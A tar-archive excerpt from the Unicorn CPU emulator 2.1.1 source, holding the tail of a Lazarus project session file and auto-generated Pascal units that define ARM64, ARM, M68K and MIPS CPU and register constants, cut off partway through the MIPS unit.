<Filename Value="/usr/local/share/fpcsrc/rtl/objpas/sysutils/sysstrh.inc"/> <EditorIndex Value="-1"/> <TopLine Value="71"/> <CursorPos X="25" Y="77"/> <UsageCount Value="10"/> </Unit3> <Unit4> <Filename Value="/usr/local/share/fpcsrc/rtl/inc/systemh.inc"/> <EditorIndex Value="-1"/> <TopLine Value="331"/> <CursorPos X="3" Y="339"/> <UsageCount Value="10"/> </Unit4> <Unit5> <Filename Value="/usr/local/share/fpcsrc/packages/rtl-console/src/unix/crt.pp"/> <UnitName Value="Crt"/> <EditorIndex Value="-1"/> <TopLine Value="1104"/> <CursorPos X="7" Y="534"/> <UsageCount Value="10"/> </Unit5> <Unit6> <Filename Value="/usr/local/share/fpcsrc/packages/rtl-console/src/inc/crth.inc"/> <EditorIndex Value="-1"/> <TopLine Value="31"/> <CursorPos X="11" Y="44"/> <UsageCount Value="10"/> </Unit6> <Unit7> <Filename Value="/usr/local/share/fpcsrc/rtl/darwin/termio.pp"/> <EditorIndex Value="-1"/> <TopLine Value="24"/> <UsageCount Value="10"/> </Unit7> <Unit8> <Filename Value="../unicorn/X86Const.pas"/> <EditorIndex Value="-1"/> <CursorPos X="57"/> <UsageCount Value="10"/> </Unit8> <Unit9> <Filename Value="/usr/local/share/fpcsrc/rtl/inc/dynlibs.pas"/> <EditorIndex Value="-1"/> <TopLine Value="46"/> <CursorPos X="25" Y="53"/> <UsageCount Value="10"/> </Unit9> </Units> <JumpHistory Count="26" HistoryIndex="25"> <Position1> <Filename Value="x86.lpr"/> <Caret Line="332" TopLine="323"/> </Position1> <Position2> <Filename Value="x86.lpr"/> <Caret Line="333" TopLine="323"/> </Position2> <Position3> <Filename Value="x86.lpr"/> <Caret Line="338" TopLine="331"/> </Position3> <Position4> <Filename Value="x86.lpr"/> <Caret Line="340" Column="42" TopLine="330"/> </Position4> <Position5> <Filename Value="x86.lpr"/> <Caret Line="339" Column="29" TopLine="335"/> </Position5> <Position6> <Filename Value="x86.lpr"/> <Caret Line="684" Column="42" TopLine="507"/> </Position6> <Position7> <Filename Value="x86.lpr"/> <Caret Line="51" Column="73" TopLine="43"/> </Position7> <Position8> <Filename Value="x86.lpr"/> <Caret Line="32" Column="16" TopLine="27"/> </Position8> <Position9> <Filename Value="x86.lpr"/> <Caret Line="895" Column="18" TopLine="889"/> </Position9> <Position10> <Filename Value="x86.lpr"/> <Caret Line="894" Column="6" TopLine="889"/> </Position10> <Position11> <Filename Value="x86.lpr"/> <Caret Line="52" Column="73" TopLine="44"/> </Position11> <Position12> <Filename Value="x86.lpr"/> <Caret Line="279" TopLine="268"/> </Position12> <Position13> <Filename Value="x86.lpr"/> <Caret Line="280" Column="26" TopLine="272"/> </Position13> <Position14> <Filename Value="x86.lpr"/> <Caret Line="898" Column="16" TopLine="883"/> </Position14> <Position15> <Filename Value="x86.lpr"/> <Caret Line="889" Column="40" TopLine="879"/> </Position15> <Position16> <Filename Value="x86.lpr"/> <Caret Line="447" Column="44" TopLine="440"/> </Position16> <Position17> <Filename Value="x86.lpr"/> <Caret Line="894" Column="12" TopLine="887"/> </Position17> <Position18> <Filename Value="x86.lpr"/> <Caret Line="255" Column="28" TopLine="247"/> </Position18> <Position19> <Filename Value="x86.lpr"/> <Caret Line="984" Column="8" TopLine="973"/> </Position19> <Position20> <Filename Value="x86.lpr"/> <Caret Line="987" Column="9" TopLine="976"/> </Position20> <Position21> <Filename Value="x86.lpr"/> <Caret Line="22" Column="15" TopLine="17"/> </Position21> <Position22> <Filename Value="../unicorn/Unicorn_dyn.pas"/> <Caret Line="128" Column="37" TopLine="119"/> </Position22> <Position23> <Filename Value="../unicorn/Unicorn_dyn.pas"/> <Caret Line="600" TopLine="597"/> </Position23> <Position24> <Filename Value="../unicorn/Unicorn_dyn.pas"/> <Caret Line="9" Column="3" TopLine="8"/> </Position24> <Position25> <Filename Value="../unicorn/Unicorn_dyn.pas"/> <Caret Line="640" Column="15" TopLine="632"/> </Position25> <Position26> <Filename Value="x86.lpr"/> <Caret Line="989" Column="132" TopLine="6"/> </Position26> </JumpHistory> </ProjectSession> <Debugging> <Watches Count="2"> <Item1> <Expression Value="mem"/> <DisplayStyle Value="wdfPointer"/> </Item1> <Item2> <Expression Value="X86_CODE32"/> <DisplayStyle Value="wdfMemDump"/> </Item2> </Watches> </Debugging> </CONFIG> ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/��������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017721�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/Arm64Const.pas������������������������������������������������0000664�0000000�0000000�00000020504�14675241067�0022327�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit Arm64Const; interface const // ARM64 CPU UC_CPU_ARM64_A57 = 0; UC_CPU_ARM64_A53 = 1; UC_CPU_ARM64_A72 = 2; UC_CPU_ARM64_MAX = 3; UC_CPU_ARM64_ENDING = 4; // ARM64 registers UC_ARM64_REG_INVALID = 0; UC_ARM64_REG_X29 = 1; UC_ARM64_REG_X30 = 2; UC_ARM64_REG_NZCV = 3; UC_ARM64_REG_SP = 4; UC_ARM64_REG_WSP = 5; UC_ARM64_REG_WZR = 6; UC_ARM64_REG_XZR = 7; UC_ARM64_REG_B0 = 8; UC_ARM64_REG_B1 = 9; UC_ARM64_REG_B2 = 10; UC_ARM64_REG_B3 = 11; UC_ARM64_REG_B4 = 12; UC_ARM64_REG_B5 = 13; UC_ARM64_REG_B6 = 14; UC_ARM64_REG_B7 = 15; UC_ARM64_REG_B8 = 16; UC_ARM64_REG_B9 = 17; UC_ARM64_REG_B10 = 18; UC_ARM64_REG_B11 = 19; UC_ARM64_REG_B12 = 20; UC_ARM64_REG_B13 = 21; UC_ARM64_REG_B14 = 22; UC_ARM64_REG_B15 = 23; UC_ARM64_REG_B16 = 24; UC_ARM64_REG_B17 = 25; UC_ARM64_REG_B18 = 26; UC_ARM64_REG_B19 = 27; UC_ARM64_REG_B20 = 28; UC_ARM64_REG_B21 = 29; UC_ARM64_REG_B22 = 30; UC_ARM64_REG_B23 = 31; UC_ARM64_REG_B24 = 32; UC_ARM64_REG_B25 = 33; UC_ARM64_REG_B26 = 34; UC_ARM64_REG_B27 = 35; UC_ARM64_REG_B28 = 36; UC_ARM64_REG_B29 = 37; UC_ARM64_REG_B30 = 38; UC_ARM64_REG_B31 = 39; UC_ARM64_REG_D0 = 40; UC_ARM64_REG_D1 = 41; UC_ARM64_REG_D2 = 42; UC_ARM64_REG_D3 = 43; UC_ARM64_REG_D4 = 44; UC_ARM64_REG_D5 = 45; UC_ARM64_REG_D6 = 46; UC_ARM64_REG_D7 = 47; UC_ARM64_REG_D8 = 48; UC_ARM64_REG_D9 = 49; UC_ARM64_REG_D10 = 50; UC_ARM64_REG_D11 = 51; UC_ARM64_REG_D12 = 52; UC_ARM64_REG_D13 = 53; UC_ARM64_REG_D14 = 54; UC_ARM64_REG_D15 = 55; UC_ARM64_REG_D16 = 56; UC_ARM64_REG_D17 = 57; UC_ARM64_REG_D18 = 58; UC_ARM64_REG_D19 = 59; UC_ARM64_REG_D20 = 60; UC_ARM64_REG_D21 = 61; UC_ARM64_REG_D22 = 62; UC_ARM64_REG_D23 = 63; UC_ARM64_REG_D24 = 64; UC_ARM64_REG_D25 = 65; UC_ARM64_REG_D26 = 66; UC_ARM64_REG_D27 = 67; UC_ARM64_REG_D28 = 68; UC_ARM64_REG_D29 = 69; UC_ARM64_REG_D30 = 70; UC_ARM64_REG_D31 = 71; UC_ARM64_REG_H0 = 72; UC_ARM64_REG_H1 = 73; UC_ARM64_REG_H2 = 74; UC_ARM64_REG_H3 = 75; UC_ARM64_REG_H4 = 76; UC_ARM64_REG_H5 = 77; UC_ARM64_REG_H6 = 78; UC_ARM64_REG_H7 = 79; UC_ARM64_REG_H8 = 80; UC_ARM64_REG_H9 = 81; UC_ARM64_REG_H10 = 82; UC_ARM64_REG_H11 = 83; UC_ARM64_REG_H12 = 84; UC_ARM64_REG_H13 = 85; UC_ARM64_REG_H14 = 86; UC_ARM64_REG_H15 = 87; UC_ARM64_REG_H16 = 88; UC_ARM64_REG_H17 = 89; UC_ARM64_REG_H18 = 90; UC_ARM64_REG_H19 = 91; UC_ARM64_REG_H20 = 92; UC_ARM64_REG_H21 = 93; UC_ARM64_REG_H22 = 94; UC_ARM64_REG_H23 = 95; UC_ARM64_REG_H24 = 96; UC_ARM64_REG_H25 = 97; UC_ARM64_REG_H26 = 98; UC_ARM64_REG_H27 = 99; UC_ARM64_REG_H28 = 100; UC_ARM64_REG_H29 = 101; UC_ARM64_REG_H30 = 102; UC_ARM64_REG_H31 = 103; UC_ARM64_REG_Q0 = 104; UC_ARM64_REG_Q1 = 105; UC_ARM64_REG_Q2 = 106; UC_ARM64_REG_Q3 = 107; UC_ARM64_REG_Q4 = 108; UC_ARM64_REG_Q5 = 109; UC_ARM64_REG_Q6 = 110; UC_ARM64_REG_Q7 = 111; UC_ARM64_REG_Q8 = 112; UC_ARM64_REG_Q9 = 113; UC_ARM64_REG_Q10 = 114; UC_ARM64_REG_Q11 = 115; UC_ARM64_REG_Q12 = 116; UC_ARM64_REG_Q13 = 117; UC_ARM64_REG_Q14 = 118; UC_ARM64_REG_Q15 = 119; UC_ARM64_REG_Q16 = 120; UC_ARM64_REG_Q17 = 121; UC_ARM64_REG_Q18 = 122; UC_ARM64_REG_Q19 = 123; UC_ARM64_REG_Q20 = 124; UC_ARM64_REG_Q21 = 125; UC_ARM64_REG_Q22 = 126; UC_ARM64_REG_Q23 = 127; UC_ARM64_REG_Q24 = 128; UC_ARM64_REG_Q25 = 129; UC_ARM64_REG_Q26 = 130; UC_ARM64_REG_Q27 = 131; UC_ARM64_REG_Q28 = 132; UC_ARM64_REG_Q29 = 133; UC_ARM64_REG_Q30 = 134; UC_ARM64_REG_Q31 = 135; UC_ARM64_REG_S0 = 136; UC_ARM64_REG_S1 = 137; UC_ARM64_REG_S2 = 138; UC_ARM64_REG_S3 = 139; UC_ARM64_REG_S4 = 140; UC_ARM64_REG_S5 = 141; UC_ARM64_REG_S6 = 142; UC_ARM64_REG_S7 = 143; UC_ARM64_REG_S8 = 144; UC_ARM64_REG_S9 = 145; UC_ARM64_REG_S10 = 146; UC_ARM64_REG_S11 = 147; UC_ARM64_REG_S12 = 148; UC_ARM64_REG_S13 = 149; UC_ARM64_REG_S14 = 150; UC_ARM64_REG_S15 = 151; UC_ARM64_REG_S16 = 152; UC_ARM64_REG_S17 = 153; UC_ARM64_REG_S18 = 154; UC_ARM64_REG_S19 = 155; UC_ARM64_REG_S20 = 156; UC_ARM64_REG_S21 = 157; UC_ARM64_REG_S22 = 158; UC_ARM64_REG_S23 = 159; UC_ARM64_REG_S24 = 160; UC_ARM64_REG_S25 = 161; UC_ARM64_REG_S26 = 162; UC_ARM64_REG_S27 = 163; UC_ARM64_REG_S28 = 164; UC_ARM64_REG_S29 = 165; UC_ARM64_REG_S30 = 166; UC_ARM64_REG_S31 = 167; UC_ARM64_REG_W0 = 168; UC_ARM64_REG_W1 = 169; UC_ARM64_REG_W2 = 170; UC_ARM64_REG_W3 = 171; UC_ARM64_REG_W4 = 172; UC_ARM64_REG_W5 = 173; UC_ARM64_REG_W6 = 174; UC_ARM64_REG_W7 = 175; UC_ARM64_REG_W8 = 176; UC_ARM64_REG_W9 = 177; UC_ARM64_REG_W10 = 178; UC_ARM64_REG_W11 = 179; UC_ARM64_REG_W12 = 180; UC_ARM64_REG_W13 = 181; UC_ARM64_REG_W14 = 182; UC_ARM64_REG_W15 = 183; UC_ARM64_REG_W16 = 184; UC_ARM64_REG_W17 = 185; UC_ARM64_REG_W18 = 186; UC_ARM64_REG_W19 = 187; UC_ARM64_REG_W20 = 188; UC_ARM64_REG_W21 = 189; UC_ARM64_REG_W22 = 190; UC_ARM64_REG_W23 = 191; UC_ARM64_REG_W24 = 192; UC_ARM64_REG_W25 = 193; UC_ARM64_REG_W26 = 194; UC_ARM64_REG_W27 = 195; UC_ARM64_REG_W28 = 196; UC_ARM64_REG_W29 = 197; UC_ARM64_REG_W30 = 198; UC_ARM64_REG_X0 = 199; UC_ARM64_REG_X1 = 200; UC_ARM64_REG_X2 = 201; UC_ARM64_REG_X3 = 202; UC_ARM64_REG_X4 = 203; UC_ARM64_REG_X5 = 204; UC_ARM64_REG_X6 = 205; UC_ARM64_REG_X7 = 206; UC_ARM64_REG_X8 = 207; UC_ARM64_REG_X9 = 208; UC_ARM64_REG_X10 = 209; UC_ARM64_REG_X11 = 210; UC_ARM64_REG_X12 = 211; UC_ARM64_REG_X13 = 212; UC_ARM64_REG_X14 = 213; UC_ARM64_REG_X15 = 214; UC_ARM64_REG_X16 = 215; UC_ARM64_REG_X17 = 216; UC_ARM64_REG_X18 = 217; UC_ARM64_REG_X19 = 218; UC_ARM64_REG_X20 = 219; UC_ARM64_REG_X21 = 220; UC_ARM64_REG_X22 = 221; UC_ARM64_REG_X23 = 222; UC_ARM64_REG_X24 = 223; UC_ARM64_REG_X25 = 224; UC_ARM64_REG_X26 = 225; UC_ARM64_REG_X27 = 226; UC_ARM64_REG_X28 = 227; UC_ARM64_REG_V0 = 228; UC_ARM64_REG_V1 = 229; UC_ARM64_REG_V2 = 230; UC_ARM64_REG_V3 = 231; UC_ARM64_REG_V4 = 232; UC_ARM64_REG_V5 = 233; UC_ARM64_REG_V6 = 234; UC_ARM64_REG_V7 = 235; UC_ARM64_REG_V8 = 236; UC_ARM64_REG_V9 = 237; UC_ARM64_REG_V10 = 238; UC_ARM64_REG_V11 = 239; UC_ARM64_REG_V12 = 240; UC_ARM64_REG_V13 = 241; UC_ARM64_REG_V14 = 242; UC_ARM64_REG_V15 = 243; UC_ARM64_REG_V16 = 244; UC_ARM64_REG_V17 = 245; UC_ARM64_REG_V18 = 246; UC_ARM64_REG_V19 = 247; UC_ARM64_REG_V20 = 248; UC_ARM64_REG_V21 = 249; UC_ARM64_REG_V22 = 250; UC_ARM64_REG_V23 = 251; UC_ARM64_REG_V24 = 252; UC_ARM64_REG_V25 = 253; UC_ARM64_REG_V26 = 254; UC_ARM64_REG_V27 = 255; UC_ARM64_REG_V28 = 256; UC_ARM64_REG_V29 = 257; UC_ARM64_REG_V30 = 258; UC_ARM64_REG_V31 = 259; // pseudo registers UC_ARM64_REG_PC = 260; UC_ARM64_REG_CPACR_EL1 = 261; // thread registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_TPIDR_EL0 = 262; UC_ARM64_REG_TPIDRRO_EL0 = 263; UC_ARM64_REG_TPIDR_EL1 = 264; UC_ARM64_REG_PSTATE = 265; // exception link registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_ELR_EL0 = 266; UC_ARM64_REG_ELR_EL1 = 267; UC_ARM64_REG_ELR_EL2 = 268; UC_ARM64_REG_ELR_EL3 = 269; // stack pointers registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_SP_EL0 = 270; UC_ARM64_REG_SP_EL1 = 271; UC_ARM64_REG_SP_EL2 = 272; UC_ARM64_REG_SP_EL3 = 273; // other CP15 registers, depreciated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_TTBR0_EL1 = 274; UC_ARM64_REG_TTBR1_EL1 = 275; UC_ARM64_REG_ESR_EL0 = 276; UC_ARM64_REG_ESR_EL1 = 277; UC_ARM64_REG_ESR_EL2 = 278; UC_ARM64_REG_ESR_EL3 = 279; UC_ARM64_REG_FAR_EL0 = 280; UC_ARM64_REG_FAR_EL1 = 281; UC_ARM64_REG_FAR_EL2 = 282; UC_ARM64_REG_FAR_EL3 = 283; UC_ARM64_REG_PAR_EL1 = 284; UC_ARM64_REG_MAIR_EL1 = 285; UC_ARM64_REG_VBAR_EL0 = 286; UC_ARM64_REG_VBAR_EL1 = 287; UC_ARM64_REG_VBAR_EL2 = 288; UC_ARM64_REG_VBAR_EL3 = 289; UC_ARM64_REG_CP_REG = 290; // floating point control and status registers UC_ARM64_REG_FPCR = 291; UC_ARM64_REG_FPSR = 292; UC_ARM64_REG_ENDING = 293; // alias registers UC_ARM64_REG_IP0 = 215; UC_ARM64_REG_IP1 = 216; UC_ARM64_REG_FP = 1; UC_ARM64_REG_LR = 2; // ARM64 instructions UC_ARM64_INS_INVALID = 0; UC_ARM64_INS_MRS = 1; UC_ARM64_INS_MSR = 2; UC_ARM64_INS_SYS = 3; UC_ARM64_INS_SYSL = 4; UC_ARM64_INS_ENDING = 5; implementation end.��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/ArmConst.pas��������������������������������������������������0000664�0000000�0000000�00000011065�14675241067�0022157�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit ArmConst; interface const // ARM CPU UC_CPU_ARM_926 = 0; UC_CPU_ARM_946 = 1; UC_CPU_ARM_1026 = 2; UC_CPU_ARM_1136_R2 = 3; UC_CPU_ARM_1136 = 4; UC_CPU_ARM_1176 = 5; UC_CPU_ARM_11MPCORE = 6; UC_CPU_ARM_CORTEX_M0 = 7; UC_CPU_ARM_CORTEX_M3 = 8; UC_CPU_ARM_CORTEX_M4 = 9; UC_CPU_ARM_CORTEX_M7 = 10; UC_CPU_ARM_CORTEX_M33 = 11; UC_CPU_ARM_CORTEX_R5 = 12; UC_CPU_ARM_CORTEX_R5F = 13; UC_CPU_ARM_CORTEX_A7 = 14; UC_CPU_ARM_CORTEX_A8 = 15; UC_CPU_ARM_CORTEX_A9 = 16; UC_CPU_ARM_CORTEX_A15 = 17; UC_CPU_ARM_TI925T = 18; UC_CPU_ARM_SA1100 = 19; UC_CPU_ARM_SA1110 = 20; UC_CPU_ARM_PXA250 = 21; UC_CPU_ARM_PXA255 = 22; UC_CPU_ARM_PXA260 = 23; UC_CPU_ARM_PXA261 = 24; UC_CPU_ARM_PXA262 = 25; UC_CPU_ARM_PXA270 = 26; UC_CPU_ARM_PXA270A0 = 27; UC_CPU_ARM_PXA270A1 = 28; UC_CPU_ARM_PXA270B0 = 29; UC_CPU_ARM_PXA270B1 = 30; UC_CPU_ARM_PXA270C0 = 31; UC_CPU_ARM_PXA270C5 = 32; UC_CPU_ARM_MAX = 33; UC_CPU_ARM_ENDING = 34; // ARM registers UC_ARM_REG_INVALID = 0; UC_ARM_REG_APSR = 1; UC_ARM_REG_APSR_NZCV = 2; UC_ARM_REG_CPSR = 3; UC_ARM_REG_FPEXC = 4; UC_ARM_REG_FPINST = 5; UC_ARM_REG_FPSCR = 6; UC_ARM_REG_FPSCR_NZCV = 7; UC_ARM_REG_FPSID = 8; UC_ARM_REG_ITSTATE = 9; UC_ARM_REG_LR = 10; UC_ARM_REG_PC = 11; UC_ARM_REG_SP = 12; UC_ARM_REG_SPSR = 13; UC_ARM_REG_D0 = 14; UC_ARM_REG_D1 = 15; UC_ARM_REG_D2 = 16; UC_ARM_REG_D3 = 17; UC_ARM_REG_D4 = 18; UC_ARM_REG_D5 = 19; UC_ARM_REG_D6 = 20; UC_ARM_REG_D7 = 21; UC_ARM_REG_D8 = 22; UC_ARM_REG_D9 = 23; UC_ARM_REG_D10 = 24; UC_ARM_REG_D11 = 25; UC_ARM_REG_D12 = 26; UC_ARM_REG_D13 = 27; UC_ARM_REG_D14 = 28; UC_ARM_REG_D15 = 29; UC_ARM_REG_D16 = 30; UC_ARM_REG_D17 = 31; UC_ARM_REG_D18 = 32; UC_ARM_REG_D19 = 33; UC_ARM_REG_D20 = 34; UC_ARM_REG_D21 = 35; UC_ARM_REG_D22 = 36; UC_ARM_REG_D23 = 37; UC_ARM_REG_D24 = 38; UC_ARM_REG_D25 = 39; UC_ARM_REG_D26 = 40; UC_ARM_REG_D27 = 41; UC_ARM_REG_D28 = 42; UC_ARM_REG_D29 = 43; UC_ARM_REG_D30 = 44; UC_ARM_REG_D31 = 45; UC_ARM_REG_FPINST2 = 46; UC_ARM_REG_MVFR0 = 47; UC_ARM_REG_MVFR1 = 48; UC_ARM_REG_MVFR2 = 49; UC_ARM_REG_Q0 = 50; UC_ARM_REG_Q1 = 51; UC_ARM_REG_Q2 = 52; UC_ARM_REG_Q3 = 53; UC_ARM_REG_Q4 = 54; UC_ARM_REG_Q5 = 55; UC_ARM_REG_Q6 = 56; UC_ARM_REG_Q7 = 57; UC_ARM_REG_Q8 = 58; UC_ARM_REG_Q9 = 59; UC_ARM_REG_Q10 = 60; UC_ARM_REG_Q11 = 61; UC_ARM_REG_Q12 = 62; UC_ARM_REG_Q13 = 63; UC_ARM_REG_Q14 = 64; UC_ARM_REG_Q15 = 65; UC_ARM_REG_R0 = 66; UC_ARM_REG_R1 = 67; UC_ARM_REG_R2 = 68; UC_ARM_REG_R3 = 69; UC_ARM_REG_R4 = 70; UC_ARM_REG_R5 = 71; UC_ARM_REG_R6 = 72; UC_ARM_REG_R7 = 73; UC_ARM_REG_R8 = 74; UC_ARM_REG_R9 = 75; UC_ARM_REG_R10 = 76; UC_ARM_REG_R11 = 77; UC_ARM_REG_R12 = 78; UC_ARM_REG_S0 = 79; UC_ARM_REG_S1 = 80; UC_ARM_REG_S2 = 81; UC_ARM_REG_S3 = 82; UC_ARM_REG_S4 = 83; UC_ARM_REG_S5 = 84; UC_ARM_REG_S6 = 85; UC_ARM_REG_S7 = 86; UC_ARM_REG_S8 = 87; UC_ARM_REG_S9 = 88; UC_ARM_REG_S10 = 89; UC_ARM_REG_S11 = 90; UC_ARM_REG_S12 = 91; UC_ARM_REG_S13 = 92; UC_ARM_REG_S14 = 93; UC_ARM_REG_S15 = 94; UC_ARM_REG_S16 = 95; UC_ARM_REG_S17 = 96; UC_ARM_REG_S18 = 97; UC_ARM_REG_S19 = 98; UC_ARM_REG_S20 = 99; UC_ARM_REG_S21 = 100; UC_ARM_REG_S22 = 101; UC_ARM_REG_S23 = 102; UC_ARM_REG_S24 = 103; UC_ARM_REG_S25 = 104; UC_ARM_REG_S26 = 105; UC_ARM_REG_S27 = 106; UC_ARM_REG_S28 = 107; UC_ARM_REG_S29 = 108; UC_ARM_REG_S30 = 109; UC_ARM_REG_S31 = 110; UC_ARM_REG_C1_C0_2 = 111; UC_ARM_REG_C13_C0_2 = 112; UC_ARM_REG_C13_C0_3 = 113; UC_ARM_REG_IPSR = 114; UC_ARM_REG_MSP = 115; UC_ARM_REG_PSP = 116; UC_ARM_REG_CONTROL = 117; UC_ARM_REG_IAPSR = 118; UC_ARM_REG_EAPSR = 119; UC_ARM_REG_XPSR = 120; UC_ARM_REG_EPSR = 121; UC_ARM_REG_IEPSR = 122; UC_ARM_REG_PRIMASK = 123; UC_ARM_REG_BASEPRI = 124; UC_ARM_REG_BASEPRI_MAX = 125; UC_ARM_REG_FAULTMASK = 126; UC_ARM_REG_APSR_NZCVQ = 127; UC_ARM_REG_APSR_G = 128; UC_ARM_REG_APSR_NZCVQG = 129; UC_ARM_REG_IAPSR_NZCVQ = 130; UC_ARM_REG_IAPSR_G = 131; UC_ARM_REG_IAPSR_NZCVQG = 132; UC_ARM_REG_EAPSR_NZCVQ = 133; UC_ARM_REG_EAPSR_G = 134; UC_ARM_REG_EAPSR_NZCVQG = 135; UC_ARM_REG_XPSR_NZCVQ = 136; UC_ARM_REG_XPSR_G = 137; UC_ARM_REG_XPSR_NZCVQG = 138; UC_ARM_REG_CP_REG = 139; UC_ARM_REG_ENDING = 140; // alias registers UC_ARM_REG_R13 = 12; UC_ARM_REG_R14 = 10; UC_ARM_REG_R15 = 11; UC_ARM_REG_SB = 75; UC_ARM_REG_SL = 76; UC_ARM_REG_FP = 77; UC_ARM_REG_IP = 78; implementation end.���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/M68kConst.pas�������������������������������������������������0000664�0000000�0000000�00000001531�14675241067�0022162�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit M68kConst; interface const // M68K CPU UC_CPU_M68K_M5206 = 0; UC_CPU_M68K_M68000 = 1; UC_CPU_M68K_M68020 = 2; UC_CPU_M68K_M68030 = 3; UC_CPU_M68K_M68040 = 4; UC_CPU_M68K_M68060 = 5; UC_CPU_M68K_M5208 = 6; UC_CPU_M68K_CFV4E = 7; UC_CPU_M68K_ANY = 8; UC_CPU_M68K_ENDING = 9; // M68K registers UC_M68K_REG_INVALID = 0; UC_M68K_REG_A0 = 1; UC_M68K_REG_A1 = 2; UC_M68K_REG_A2 = 3; UC_M68K_REG_A3 = 4; UC_M68K_REG_A4 = 5; UC_M68K_REG_A5 = 6; UC_M68K_REG_A6 = 7; UC_M68K_REG_A7 = 8; UC_M68K_REG_D0 = 9; UC_M68K_REG_D1 = 10; UC_M68K_REG_D2 = 11; UC_M68K_REG_D3 = 12; UC_M68K_REG_D4 = 13; UC_M68K_REG_D5 = 14; UC_M68K_REG_D6 = 15; UC_M68K_REG_D7 = 16; UC_M68K_REG_SR = 17; UC_M68K_REG_PC = 18; UC_M68K_REG_ENDING = 19; implementation end.�����������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/MipsConst.pas�������������������������������������������������0000664�0000000�0000000�00000012675�14675241067�0022360�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit MipsConst; interface const // MIPS32 CPUS UC_CPU_MIPS32_4KC = 0; UC_CPU_MIPS32_4KM = 1; UC_CPU_MIPS32_4KECR1 = 2; UC_CPU_MIPS32_4KEMR1 = 3; UC_CPU_MIPS32_4KEC = 4; UC_CPU_MIPS32_4KEM = 5; UC_CPU_MIPS32_24KC = 6; UC_CPU_MIPS32_24KEC = 7; UC_CPU_MIPS32_24KF = 8; UC_CPU_MIPS32_34KF = 9; UC_CPU_MIPS32_74KF = 10; UC_CPU_MIPS32_M14K = 11; UC_CPU_MIPS32_M14KC = 12; UC_CPU_MIPS32_P5600 = 13; UC_CPU_MIPS32_MIPS32R6_GENERIC = 14; UC_CPU_MIPS32_I7200 = 15; UC_CPU_MIPS32_ENDING = 16; // MIPS64 CPUS UC_CPU_MIPS64_R4000 = 0; UC_CPU_MIPS64_VR5432 = 1; UC_CPU_MIPS64_5KC = 2; UC_CPU_MIPS64_5KF = 3; UC_CPU_MIPS64_20KC = 4; UC_CPU_MIPS64_MIPS64R2_GENERIC = 5; UC_CPU_MIPS64_5KEC = 6; UC_CPU_MIPS64_5KEF = 7; UC_CPU_MIPS64_I6400 = 8; UC_CPU_MIPS64_I6500 = 9; UC_CPU_MIPS64_LOONGSON_2E = 10; UC_CPU_MIPS64_LOONGSON_2F = 11; UC_CPU_MIPS64_MIPS64DSPR2 = 12; UC_CPU_MIPS64_ENDING = 13; // MIPS registers UC_MIPS_REG_INVALID = 0; // General purpose registers UC_MIPS_REG_PC = 1; UC_MIPS_REG_0 = 2; UC_MIPS_REG_1 = 3; UC_MIPS_REG_2 = 4; UC_MIPS_REG_3 = 5; UC_MIPS_REG_4 = 6; UC_MIPS_REG_5 = 7; UC_MIPS_REG_6 = 8; UC_MIPS_REG_7 = 9; UC_MIPS_REG_8 = 10; UC_MIPS_REG_9 = 11; UC_MIPS_REG_10 = 12; UC_MIPS_REG_11 = 13; UC_MIPS_REG_12 = 14; UC_MIPS_REG_13 = 15; UC_MIPS_REG_14 = 16; UC_MIPS_REG_15 = 17; UC_MIPS_REG_16 = 18; UC_MIPS_REG_17 = 19; UC_MIPS_REG_18 = 20; UC_MIPS_REG_19 = 21; UC_MIPS_REG_20 = 22; UC_MIPS_REG_21 = 23; UC_MIPS_REG_22 = 24; UC_MIPS_REG_23 = 25; UC_MIPS_REG_24 = 26; UC_MIPS_REG_25 = 27; UC_MIPS_REG_26 = 28; UC_MIPS_REG_27 = 29; UC_MIPS_REG_28 = 30; UC_MIPS_REG_29 = 31; UC_MIPS_REG_30 = 32; UC_MIPS_REG_31 = 33; // DSP registers UC_MIPS_REG_DSPCCOND = 34; UC_MIPS_REG_DSPCARRY = 35; UC_MIPS_REG_DSPEFI = 36; UC_MIPS_REG_DSPOUTFLAG = 37; UC_MIPS_REG_DSPOUTFLAG16_19 = 38; UC_MIPS_REG_DSPOUTFLAG20 = 39; UC_MIPS_REG_DSPOUTFLAG21 = 40; UC_MIPS_REG_DSPOUTFLAG22 = 41; UC_MIPS_REG_DSPOUTFLAG23 = 42; UC_MIPS_REG_DSPPOS = 43; UC_MIPS_REG_DSPSCOUNT = 44; // ACC registers UC_MIPS_REG_AC0 = 45; UC_MIPS_REG_AC1 = 46; UC_MIPS_REG_AC2 = 47; UC_MIPS_REG_AC3 = 48; // COP registers UC_MIPS_REG_CC0 = 49; UC_MIPS_REG_CC1 = 50; UC_MIPS_REG_CC2 = 51; UC_MIPS_REG_CC3 = 52; UC_MIPS_REG_CC4 = 53; UC_MIPS_REG_CC5 = 54; 